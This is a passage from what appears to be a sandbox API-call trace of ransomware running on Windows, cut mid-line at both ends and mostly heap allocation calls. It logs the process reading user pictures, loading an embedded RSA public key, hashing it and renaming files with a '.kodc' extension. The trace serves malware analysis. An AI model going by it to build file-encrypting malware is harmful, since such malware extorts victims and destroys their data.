hHeap=0x630000) returned 1 [0099.771] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x33183f8 [0099.771] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0099.771] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bc60 [0099.771] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0099.771] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a10 [0099.771] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0099.771] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0099.771] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec50 [0099.772] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec60 [0099.772] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec80 [0099.772] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0099.772] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecb0 [0099.772] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0099.772] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb79e0 [0099.772] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0099.772] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec50 [0099.772] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0099.772] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0099.772] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec70 [0099.772] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ced00 [0099.772] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cece0 [0099.772] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a58 [0099.772] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ced00 | out: hHeap=0x630000) returned 1 [0099.772] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adee0 [0099.772] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec70 | out: hHeap=0x630000) returned 1 [0099.772] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb79b0 [0099.772] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cece0 | out: hHeap=0x630000) returned 1 [0099.772] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a40 [0099.772] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0099.772] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb79c8 [0099.772] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0099.773] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a28 [0099.773] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 [0099.773] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb7a70 [0099.773] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a28 | out: hHeap=0x630000) returned 1 [0099.773] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb7a28 [0099.773] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb79c8 | out: hHeap=0x630000) returned 1 [0099.773] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cecb0 [0099.773] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0099.773] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32ad2c0 [0099.773] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 [0099.773] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32ad520 [0099.773] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb79e0 | out: hHeap=0x630000) returned 1 [0099.773] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb79e0 [0099.773] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0099.774] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x9b96968 [0099.774] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a10 | out: hHeap=0x630000) returned 1 [0099.774] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c540 [0099.774] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a28 | out: hHeap=0x630000) returned 1 [0099.774] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x32cef08 [0099.774] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad520 | out: hHeap=0x630000) returned 1 [0099.774] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10c) returned 0x9b8c770 [0099.774] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0099.774] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c428 [0099.774] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb79e0 | out: hHeap=0x630000) returned 1 [0099.774] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x6948b0 [0099.774] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c540 | out: hHeap=0x630000) returned 1 [0099.774] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69ba50 [0099.774] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0099.774] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x693378 | out: hHeap=0x630000) returned 1 [0099.774] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bd68 | out: hHeap=0x630000) returned 1 [0099.775] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xe761, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0099.775] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x69b948*, lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 [0099.775] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0099.775] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0099.775] CloseHandle (hObject=0x5cc) returned 1 [0099.780] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x693378 [0099.780] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x890) returned 0x32d0db8 [0099.781] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\sedQsW54hh3wTvzgi.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\sedqsw54hh3wtvzgi.gif"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\sedQsW54hh3wTvzgi.gif.kodc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\sedqsw54hh3wtvzgi.gif.kodc")) returned 1 [0099.782] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcc9f12c0, ftCreationTime.dwHighDateTime=0x1d5b6c4, ftLastAccessTime.dwLowDateTime=0x7246c50, ftLastAccessTime.dwHighDateTime=0x1d5c382, ftLastWriteTime.dwLowDateTime=0x7246c50, ftLastWriteTime.dwHighDateTime=0x1d5c382, nFileSizeHigh=0x0, nFileSizeLow=0x96f9, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="uP81S.jpg", cAlternateFileName="")) returned 1 [0099.782] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x33183f8 [0099.782] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x76) returned 0x33362c8 [0099.782] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\uP81S.jpg") returned=".jpg" [0099.782] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\uP81S.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\up81s.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0099.783] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=38649) returned 1 [0099.783] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0099.786] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x96d3, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0099.786] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0099.787] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0099.787] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0099.787] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0099.787] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0x96f9, lpOverlapped=0x0) returned 1 [0099.787] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0099.787] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f1) returned 0x32d2a78 [0099.787] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0099.787] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0099.787] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x6932f0) returned 1 [0099.788] CryptCreateHash (in: hProv=0x6932f0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0099.788] CryptHashData (hHash=0x3331bc8, pbData=0x32d2a78, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0099.788] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0099.788] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32adf00 [0099.788] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x32adf00, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32adf00, pdwDataLen=0x9e2fa54) returned 1 [0099.788] GetLastError () returned 0x0 [0099.788] CryptDestroyHash (hHash=0x3331bc8) returned 1 [0099.788] CryptReleaseContext (hProv=0x6932f0, dwFlags=0x0) returned 1 [0099.788] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0099.788] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0099.788] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) returned 0x0 [0099.788] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0099.788] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0099.789] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0099.789] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0099.789] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9700) returned 0x9ba6d90 [0099.789] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0099.789] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0099.789] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32cc1c0 [0099.789] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0099.789] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32d2a78 [0099.789] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338ee8 [0099.789] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9bf08 [0099.789] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb79f8 [0099.789] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9bf50 [0099.789] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb79b0 [0099.789] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a58 [0099.789] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a40 [0099.789] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a70 [0099.789] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x334ce70 [0099.789] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x9b9f078 [0099.789] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x9b9f078, Size=0x218) returned 0x32cef08 [0099.789] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x333b018 [0099.789] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a58 | out: hHeap=0x630000) returned 1 [0099.789] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a70 | out: hHeap=0x630000) returned 1 [0099.789] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a40 | out: hHeap=0x630000) returned 1 [0099.789] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x334ce70 | out: hHeap=0x630000) returned 1 [0099.789] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333b018 | out: hHeap=0x630000) returned 1 [0099.789] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a40 [0099.789] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec00 [0099.789] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb7a70 [0099.789] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32aed00 [0099.789] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x9bb7a58 [0099.790] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec10 [0099.790] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x9b8c658 [0099.790] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0099.790] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338fa8 [0099.790] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adf00 [0099.790] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x9b8c770 [0099.790] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adee0 [0099.790] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0099.790] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c658 | out: hHeap=0x630000) returned 1 [0099.790] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a70 | out: hHeap=0x630000) returned 1 [0099.790] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0099.790] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a58 | out: hHeap=0x630000) returned 1 [0099.790] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32aed00 | out: hHeap=0x630000) returned 1 [0099.790] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0099.790] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a40 | out: hHeap=0x630000) returned 1 [0099.790] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0099.790] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338ee8 | out: hHeap=0x630000) returned 1 [0099.790] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0099.790] GetCurrentThreadId () returned 0x42c [0099.790] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69b948 [0099.790] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x9ba5d68 [0099.790] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x3316db8 [0099.790] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x6932f0 [0099.790] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x3298d18 [0099.790] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0099.790] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0099.790] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bc60 [0099.790] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0099.790] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0099.790] GetCurrentThreadId () returned 0x42c [0099.790] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0099.790] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0099.790] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x32b14c8 [0099.790] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0099.790] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0099.790] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0099.791] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0099.791] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b14c8 | out: hHeap=0x630000) returned 1 [0099.791] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69be70 [0099.791] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0099.791] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x33183f8 [0099.791] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0099.791] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69ba50 [0099.791] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0099.791] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a40 [0099.791] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0099.791] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0099.791] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec80 [0099.791] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec50 [0099.791] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecb0 [0099.791] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0099.791] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec60 [0099.791] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0099.791] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a58 [0099.791] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0099.791] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec80 [0099.791] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0099.791] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0099.791] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cece0 [0099.791] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec70 [0099.791] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ced00 [0099.791] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a70 [0099.791] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec70 | out: hHeap=0x630000) returned 1 [0099.791] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32aed00 [0099.791] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cece0 | out: hHeap=0x630000) returned 1 [0099.791] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb79e0 [0099.791] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ced00 | out: hHeap=0x630000) returned 1 [0099.791] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a28 [0099.791] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0099.791] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a10 [0099.791] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0099.791] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb79c8 [0099.791] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0099.792] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb7a88 [0099.792] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb79c8 | out: hHeap=0x630000) returned 1 [0099.792] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb79c8 [0099.792] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a10 | out: hHeap=0x630000) returned 1 [0099.792] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec60 [0099.792] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0099.792] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32ad2c0 [0099.792] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0099.792] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32ad520 [0099.792] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a58 | out: hHeap=0x630000) returned 1 [0099.792] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a58 [0099.792] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0099.792] RtlAllocateHeap (HeapHandle=0x630000, 